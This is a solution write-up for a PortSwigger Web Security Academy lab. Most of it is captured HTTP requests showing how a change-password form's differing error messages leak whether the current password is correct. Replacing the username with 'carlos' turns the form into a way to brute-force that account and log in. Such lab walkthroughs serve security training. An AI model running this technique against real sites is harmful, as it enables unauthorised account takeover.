Port Swigger Password brute force via password cha
Password brute-force via password change
Solution
Login to website as user: wiener
GET /login HTTP/2
Host: 0a1600fe047d442881312a22007700d4.web-security-academy.net
Cookie: session=5m0MW10ngWCyOPmP3VtCiTc49CI2miai
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a1600fe047d442881312a22007700d4.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
POST /login HTTP/2
Host: 0a1600fe047d442881312a22007700d4.web-security-academy.net
Cookie: session=5m0MW10ngWCyOPmP3VtCiTc49CI2miai
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Origin: https://0a1600fe047d442881312a22007700d4.web-security-academy.net
Referer: https://0a1600fe047d442881312a22007700d4.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
username=wiener&password=peter
Change password for user: wiener
POST /my-account/change-password HTTP/2
Host: 0a1600fe047d442881312a22007700d4.web-security-academy.net
Cookie: session=WXNbonkAP5nbse0a7Uz57sFwbrfZe3k9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 82
Origin: https://0a1600fe047d442881312a22007700d4.web-security-academy.net
Referer: https://0a1600fe047d442881312a22007700d4.web-security-academy.net/my-account?id=wiener
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
username=wiener¤t-password=peter&new-password-1=qwerty&new-password-2=qwerty
Checking password change logic
Incorrect current password and new passwords don't match --> Current password is incorrect
Correct current password and new passwords don't match --> New passwords do not match
---
(1)
Request
POST /my-account/change-password HTTP/2
Host: 0a1600fe047d442881312a22007700d4.web-security-academy.net
Cookie: session=WXNbonkAP5nbse0a7Uz57sFwbrfZe3k9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
Origin: https://0a1600fe047d442881312a22007700d4.web-security-academy.net
Referer: https://0a1600fe047d442881312a22007700d4.web-security-academy.net/my-account?id=wiener
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
username=wiener¤t-password=qwertyqwerty&new-password-1=pass1&new-password-2=pass2
___
Response
...
<header class="notification-header">
</header>
<h1>My Account</h1>
<p class=is-warning>Current password is incorrect</p>
<div id=account-content>
...
---
(1)
Request
POST /my-account/change-password HTTP/2
Host: 0a1600fe047d442881312a22007700d4.web-security-academy.net
Cookie: session=WXNbonkAP5nbse0a7Uz57sFwbrfZe3k9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
Origin: https://0a1600fe047d442881312a22007700d4.web-security-academy.net
Referer: https://0a1600fe047d442881312a22007700d4.web-security-academy.net/my-account?id=wiener
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
username=wiener¤t-password=qwerty&new-password-1=pass1&new-password-2=pass2
___
Response
<header class="notification-header">
</header>
<h1>My Account</h1>
<p class=is-warning>New passwords do not match</p>
<div id=account-content>
<p>Your username is: wiener</p>
Brute force password for user: carlos
Edit username: carlos
current-password=querty (current password)
new-password=pass1 (random password)
new-password=pass1 (random password)
List of passwords from: https://portswigger.net/web-security/authentication/auth-lab-passwords
---
POST /my-account/change-password HTTP/2
Host: 0a1600fe047d442881312a22007700d4.web-security-academy.net
Cookie: session=WXNbonkAP5nbse0a7Uz57sFwbrfZe3k9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
Origin: https://0a1600fe047d442881312a22007700d4.web-security-academy.net
Referer: https://0a1600fe047d442881312a22007700d4.web-security-academy.net/my-account?id=wiener
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
username=carlos¤t-password=qwerty&new-password-1=pass1&new-password-2=pass2
Login to website as user: carlos
Login: password
Password: thunder
---
POST /my-account/change-password HTTP/2
Host: 0a1600fe047d442881312a22007700d4.web-security-academy.net
Cookie: session=WXNbonkAP5nbse0a7Uz57sFwbrfZe3k9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 82
Origin: https://0a1600fe047d442881312a22007700d4.web-security-academy.net
Referer: https://0a1600fe047d442881312a22007700d4.web-security-academy.net/my-account?id=wiener
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive
username=carlos¤t-password=thunder&new-password-1=pass1&new-password-2=pass2
---
POST /login HTTP/2
Host: 0a1600fe047d442881312a22007700d4.web-security-academy.net
Cookie: session=pGgdwKplDzAtqUWchbHpkHi9APhbIekP
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
Origin: https://0a1600fe047d442881312a22007700d4.web-security-academy.net
Referer: https://0a1600fe047d442881312a22007700d4.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
username=carlos&password=thunder
Solved